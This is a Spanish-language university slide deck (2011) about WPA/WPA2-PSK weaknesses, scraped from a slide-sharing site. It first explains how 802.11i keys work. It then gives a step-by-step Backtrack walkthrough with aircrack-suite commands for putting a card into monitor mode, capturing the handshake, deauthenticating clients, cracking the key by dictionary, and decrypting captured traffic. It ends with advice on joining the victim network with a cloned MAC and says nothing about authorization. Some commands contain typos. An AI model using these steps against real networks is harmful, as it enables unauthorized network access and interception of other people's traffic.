vulnerabilidad wpa
TRANSCRIPT
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 1/18
Vulnerabilidad WPA
Ing. Rafael García Chinguel
UNIVERSIDAD NACIONAL PEDRO RUIZ GALLOFACULTAD DE CIENCIAS FISICAS Y MATEMATICAS
ESCUELA PROFESIONAL DE INGENIERIAELECTRONICA
SINTEC
2011
1
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 2/18
Contenido
• IEEE 802.11i - WPA
• REQUISITOS PARA VULNERAR WPA
•
Ejemplo de vulnerar una clave wpa
2
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 3/18
IEEE 802.11i
3
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 4/18
Objetivos de 802.11i
• Autentificación
• APCliente: El AP tiene que garantizar que el clientees quien dice ser
•
Cliente
AP: El Cliente tiene que garantizar que el APes verdadero y no un AP engañoso (man – in –the –middle attack)
• Privacidad
La información no es legible por terceros.• Integridad
La información no puede ser alterada en transito.
4
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 5/18
Como trabaja 802.11i
802.11i tiene 3 partes
– Supplicant (Solicitante, Cliente)
– Authenticator (Autenticador, AP)
– Authentication Server (Servidor de Autenticación,RADIUS)
Y es hecha por una combinación de protocolos:
–
802.1X – A Port Based Network Access Control – EAP – Extensible Authentication Protocol
– RADIUS – Remote Access Dial In User Service
5
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 6/18
Variantes de 802.11i
El proceso de autenticación puede ser de 2
maneras:
– Home Mode: (modo casero, personal)
• Pre Shared Key (PSK)
– Enterprise Mode: (modo corporativo)
• 802.1X/EAP
6
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 7/18
802.11i PSK
Una “llave Maestra” llamada PMK – Pairwise Master Key es creada porun hash entre la Passphrase y elSSID.
La PMK es guardada en el Registrode Windows ó en supplicant.conf en
Linux.
Otra llave llamada PTK Pairwise
Transient Key es creada de manera
dinámica después de un proceso de
handshake de 4 vías. PTK es únicaa cada sesión.
7
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 8/18
Privacidad con 802.11i
Privacidad
• Después de la autenticación, los dos lados – AP y Cliente tienen la misma PMK – Pairwise
Master Key que se mantiene durante toda lasesión
• Para la transmisión de datos, es hecha una
derivación de la PMK y una PTK – PairwiseTransient Key única para cada cliente esutilizada para encriptación.
8
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 9/18
Integridad con 802.11iUna parte de la PTK tiene la función de proteger los datospara que no sean alterados cuando en transito – es el MICMessage Integrity Check (MIC). Con el MIC, para todo
paquete el transmisor calcula un hash de los datos con unallave secreta – Temporal Integrity Key.
MIC = hash(packet, temporal integrity key)
WPA usa TKIPAlgoritimo de Hashing “Michael”
WPA2 uses CCMPCipher Block Chaining MessageAuthentication Check – CBCMAC
9
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 10/18
¿ Cuanto segura es WPA / WPA2 PSK ?
• La manera conocida hoy de crackear WPA/PSK essolamente por un ataque de diccionario.
• Como la llave maestra PMK combina una contraseña con elSSID, escogiendo dos palabras fuertes, hace ineficientes los
diccionarios pre-compilados• No hay diferencias en la manera y nivel de dificultad para
crackear WPA-PSK ó WPA2-PSK, porque el mecanismo quegenera la PMK es el mismo. Solamente cambia el MIC.
• Herramienta para quiebra de WPA/WPA2 – PSK –
Cowpatty http://sourceforge.net/projects/cowpatty • La mayor fragilidad de PSK para WISP’s es que la llave se
encuentra en texto plano en las computadoras de losclientes
10
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 11/18
¿ Cuán segura es WPA / WPA2 PSK ?
Cuando el atacante tiene la llave PMK es
possible:
• Ganar acceso no autorizado
• Falsificar un Punto de acceso y hacer el ataque
del “hombre del medio” (man in the middle)
11
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 12/18
REQUISITOS PARA VULNERAR WPA
• Tener diccionarios: *.txt
• Backtrack 5 en USB ó DVD
•
Tarjeta inalámbrica
12
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 13/18
EJEMPLO DE VULNERAR UNA CLAVEWPA
13
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 14/18
INICIANDO EL PROCESO CON
BACKTRACK
• Cambiar orden de booteo (Bootear con DVD O
USB):
– Start Backtrack in text mode
– startx (consola grafica)
– iwconfig (muestra las tarjetas que están
instaladas)
– User: root y passwd: toor, en algunas
distribuciones de backtrack
14
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 15/18
1ER CLI DE BACKTRACK
1- Configurar tarjeta modo monitor
airodump-ng start wlan0
2. Reconocer el entorno inalámbricoairodump-ng wlan0 –t WPA
3. Capturar paquete de datos: Handshakeairodump-ng –c canal –b mac_AP -w nombre_archivo wlan0
15
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 16/18
2DA CLI DE BACKTRACK
4 . Asociación falsa usuario cliente:
(Tiene que existir un cliente)
aireplay-ng -1 0 –a “Mac_AP” –h “Mac_Cliente” wlan0
5. Ataque 0 (para desauntenticar al cliente)
aireplay-ng -0 10 -a “Mac_AP” -c “Mac _Cliente” wlan0
6. Busca la clave:
aircrack-ng –w ruta_del_diccionario –b mac_ap “ruta del hankshake”
16
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 17/18
DECODIFICACION Y ANALISIS DE IP Y
DNS
7. Decodificar los paquetes:
airdecap-ng –p “frase clave” –e ssid “ruta completa de archivo.cap”
Nota que se genera un nuevo archivo captura-01-
dec.cap (descifrada)
8. Analizar el trafico capturado:
wireshark “ruta del nuevo archivo.dec.cap”
Filter: DNS
17
5/17/2018 Vulnerabilidad WPA - slidepdf.com
http://slidepdf.com/reader/full/vulnerabilidad-wpa 18/18
CONECTARSE A LA RED
• LO UNICO QUE QUEDA ES CONECTARSE A LA
RED BAJO CUALQUIER SISTEMA OPERATIVO
• SE DEBE TENER EN CUENTA:
– CLONAR MAC
– EL MISMO SEGMENTO DE RED
– DNS
18